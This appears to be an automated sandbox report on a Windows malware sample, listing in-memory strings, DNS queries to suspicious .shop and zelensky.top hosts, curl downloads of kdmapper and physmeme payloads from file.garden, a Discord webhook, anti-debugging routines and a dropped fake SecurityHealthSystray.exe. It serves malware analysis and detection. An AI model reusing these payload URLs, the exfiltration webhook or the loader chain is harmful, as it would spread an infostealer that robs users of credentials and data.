Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptch equals www.youtube.com (Youtube)
Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptch equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: file.garden
Source: global traffic	DNS traffic detected: DNS query: tiddymarktwo.shop
Source: global traffic	DNS traffic detected: DNS query: surveriysiop.shop
Source: global traffic	DNS traffic detected: DNS query: captainynfanw.shop
Source: global traffic	DNS traffic detected: DNS query: tearrybyiwo.shop
Source: global traffic	DNS traffic detected: DNS query: appleboltelwk.shop
Source: global traffic	DNS traffic detected: DNS query: tendencerangej.shop
Source: global traffic	DNS traffic detected: DNS query: fossillargeiw.shop
Source: global traffic	DNS traffic detected: DNS query: coursedonnyre.shop
Source: global traffic	DNS traffic detected: DNS query: strappystyio.shop
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: zelensky.top

Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: powershell.exe, 00000020.00000002.1969358434.00000251FE250000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mic
Source: powershell.exe, 00000020.00000002.1969358434.00000251FE250000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micft.cMicRosof
Source: powershell.exe, 0000001F.00000002.1911610338.000001D6B02F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1888230589.00000251F5E62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000020.00000002.1757221368.00000251E6018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000001F.00000002.1759033398.000001D6A04A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1757221368.00000251E6018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: msedge.exe, 00000010.00000002.1710778572.0000000002DD7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1759033398.000001D6A0281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1757221368.00000251E5DF1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000033.00000002.1974383608.000000000361C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000001F.00000002.1759033398.000001D6A04A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1757221368.00000251E6018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000020.00000002.1757221368.00000251E6018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: seoI30IZZr.exe	String found in binary or memory: http://www.houseindustries.com/license
Source: seoI30IZZr.exe	String found in binary or memory: http://www.houseindustries.com/licenseBurbank
Source: seoI30IZZr.exe	String found in binary or memory: http://www.houseindustries.com/licenseCopyright
Source: seoI30IZZr.exe	String found in binary or memory: http://www.houseindustries.comhttp://www.talleming.comHouse
Source: powershell.exe, 00000020.00000002.1965574807.00000251FDFE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
Source: msedge.exe, 00000033.00000002.1974383608.000000000361C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://zelensky.top
Source: msedge.exe, 00000033.00000002.1974383608.000000000361C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://zelensky.top/
Source: msedge.exe, 00000033.00000002.1974383608.000000000361C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://zelensky.top/RequestlongpolllinuxTrafficlocalpublicUploads.php
Source: powershell.exe, 0000001F.00000002.1759033398.000001D6A0281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1757221368.00000251E5DF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: seoI30IZZr.exe	String found in binary or memory: https://auth.gg/
Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/
Source: RegAsm.exe, 0000000C.00000002.1539072890.0000000001357000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: RegAsm.exe, 0000000C.00000002.1539072890.0000000001357000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/fatalerror.css?v=wctRWaBvNt2z&l=engli
Source: RegAsm.exe, 0000000C.00000002.1539072890.0000000001357000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: RegAsm.exe, 0000000C.00000002.1538540291.00000000012FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: RegAsm.exe, 0000000C.00000002.1538540291.00000000012FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=PzKBszTg
Source: RegAsm.exe, 0000000C.00000002.1539072890.0000000001357000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: RegAsm.exe, 0000000C.00000002.1539072890.0000000001357000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: RegAsm.exe, 0000000C.00000002.1539072890.0000000001357000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
Source: RegAsm.exe, 0000000C.00000002.1539072890.0000000001357000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: powershell.exe, 00000020.00000002.1888230589.00000251F5E62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000020.00000002.1888230589.00000251F5E62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000020.00000002.1888230589.00000251F5E62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: seoI30IZZr.exe	String found in binary or memory: https://discord.com/api/webhooks/1247249666907701321/mhniI9J0YWG308w-rJbT6rxKaLF0IflJIgI4sGWLEdUFWwO
Source: curl.exe, 00000004.00000002.1492818711.0000019B0A2A0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000002.1492818711.0000019B0A2A7000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1492267172.0000019B0A2DC000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1492314570.0000019B0A2DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin
Source: curl.exe, 00000004.00000002.1492818711.0000019B0A2A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin--outputC:
Source: curl.exe, 00000004.00000002.1492818711.0000019B0A2AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.binbth.dll
Source: curl.exe, 00000007.00000002.1509267564.000001B321110000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000002.1509387760.000001B321126000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.1509003906.000001B321125000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000002.1509487975.000001B32114A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000002.1509267564.000001B321118000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin
Source: curl.exe, 00000007.00000002.1509267564.000001B321110000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin--outputC:
Source: powershell.exe, 00000020.00000002.1757221368.00000251E6018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: powershell.exe, 0000001F.00000002.1911610338.000001D6B02F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1888230589.00000251F5E62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: RegAsm.exe, 0000000C.00000002.1539072890.0000000001357000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.1538540291.00000000012DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: RegAsm.exe, 0000000C.00000002.1538540291.00000000012DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/i
Source: RegAsm.exe, 0000000C.00000002.1538668307.0000000001304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000132A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900%
Source: RegAsm.exe, 0000000C.00000002.1538668307.0000000001304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900S
Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: RegAsm.exe, 0000000C.00000002.1539072890.0000000001357000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: RegAsm.exe, 0000000C.00000002.1538540291.00000000012DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://strappystyio.shop/api=
Source: RegAsm.exe, 0000000C.00000002.1538540291.00000000012DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://surveriysiop.shop/api
Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:49710 version: TLS 1.2

Source: C:\Users\user\Desktop\seoI30IZZr.exe

Code function: 0_2_00007FF7865F2CE0 OpenClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,CloseClipboard,

0_2_00007FF7865F2CE0

Source: C:\Users\user\Desktop\seoI30IZZr.exe

Code function: 0_2_00007FF7865F2CE0 OpenClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,CloseClipboard,

0_2_00007FF7865F2CE0

Source: C:\Users\user\Desktop\seoI30IZZr.exe

Code function: 0_2_00007FF7865F2A90 free,OpenClipboard,GetClipboardData,CloseClipboard,GlobalLock,malloc,memcpy,free,GlobalUnlock,CloseClipboard,

0_2_00007FF7865F2A90

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_00438E3C GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

12_2_00438E3C

Source: C:\Users\user\Desktop\seoI30IZZr.exe

Code function: 0_2_00007FF78661DD90 pow,pow,sqrt,memchr,memchr,memchr,memchr,memchr,memchr,memchr,memchr,SendInput,GetAsyncKeyState,_invalid_parameter_noinfo_noreturn,

0_2_00007FF78661DD90

Source: C:\Users\user\Desktop\seoI30IZZr.exe

Code function: 0_2_00007FF7866236B0 PeekMessageA,TranslateMessage,DispatchMessageA,GetForegroundWindow,GetWindow,SetWindowPos,GetClientRect,ClientToScreen,GetCursorPos,GetAsyncKeyState,SetWindowPos,GetClientRect,QueryPerformanceCounter,GetKeyState,GetKeyState,GetKeyState,ClientToScreen,SetCursorPos,GetActiveWindow,GetCursorPos,ScreenToClient,GetAsyncKeyState,rand,GetAsyncKeyState,free,DestroyWindow,_invalid_parameter_noinfo_noreturn,

0_2_00007FF7866236B0

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF786614760 GetModuleHandleA,GetProcAddress,VirtualProtect,VirtualProtect,LoadLibraryA,GetProcAddress,GetCurrentThread,NtSetInformationThread,QueryPerformanceFrequency,QueryPerformanceCounter,QueryPerformanceCounter,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,		0_2_00007FF786614760
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF786614BD0 IsDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,CheckRemoteDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,memset,GetCurrentThread,GetThreadContext,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,memset,VirtualFree,SetLastError,GetLastError,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualFree,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,OpenThread,LoadLibraryA,GetProcAddress,NtSetInformationThread,CloseHandle,Thread32Next,CloseHandle,GetTickCount,GetTickCount,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetProcessHeap,HeapSetInformation,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,		0_2_00007FF786614BD0

Source: C:\Users\user\Desktop\seoI30IZZr.exe

Code function: 0_2_00007FF786623ED0: CreateThread,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cin@std@@3V?$basic_istream@DU?$char_traits@D@std@@@1@A,??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z,system,CreateFileW,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,system,system,system,system,system,system,system,system,system,system,system,system,system,system,system,system,system,system,system,system,system,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,Sleep,system,system,system,CreateFileW,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,system,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,MessageBoxA,system,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,Process32Next,CloseHandle,DeviceIoControl,MessageBoxA,exit,CloseHandle,_beginthreadex,_Thrd_detach,_beginthreadex,_Thrd_detach,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,DefWindowProcA,LoadIconA,LoadCursorA,LoadIconA,GetDesktopWindow,GetWindowRect,RegisterClassExA,CreateWindowExA,SetWindowLongA,DwmExtendFrameIntoClientArea,ShowWindow,SetWindowPos,SetLayeredWindowAttributes,UpdateWindow,?_Throw_Cpp_error@std@@YAXH@Z,?_Throw_Cpp_error@std@@YAXH@Z,?_Throw_Cpp_error@std@@YAXH@Z,?_Throw_Cpp_error@std@@YAXH@Z,

0_2_00007FF786623ED0

Source: C:\Windows\System32\curl.exe	File created: C:\Windows\Speech\kdmapper.exe	Jump to behavior
Source: C:\Windows\System32\curl.exe	File created: C:\Windows\Speech\physmeme.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\CSC90DD46E6AB146EBB2673718B916635.TMP
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\SecurityHealthSystray.exe

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File deleted: C:\Windows\System32\CSC90DD46E6AB146EBB2673718B916635.TMP

Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF786614760	0_2_00007FF786614760
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF786623ED0	0_2_00007FF786623ED0
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF786614BD0	0_2_00007FF786614BD0
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF786614300	0_2_00007FF786614300
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF78662C2E0	0_2_00007FF78662C2E0
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF78662272A	0_2_00007FF78662272A
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF786617730	0_2_00007FF786617730
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF786622733	0_2_00007FF786622733
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF78662271B	0_2_00007FF78662271B
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF7865FA800	0_2_00007FF7865FA800
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF7865F97A0	0_2_00007FF7865F97A0
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF7865EB875	0_2_00007FF7865EB875
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF7865FA040	0_2_00007FF7865FA040
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF78660F040	0_2_00007FF78660F040
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF7865F4820	0_2_00007FF7865F4820
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF78662C110	0_2_00007FF78662C110
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF7865FF8F0	0_2_00007FF7865FF8F0
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF78661DD90	0_2_00007FF78661DD90
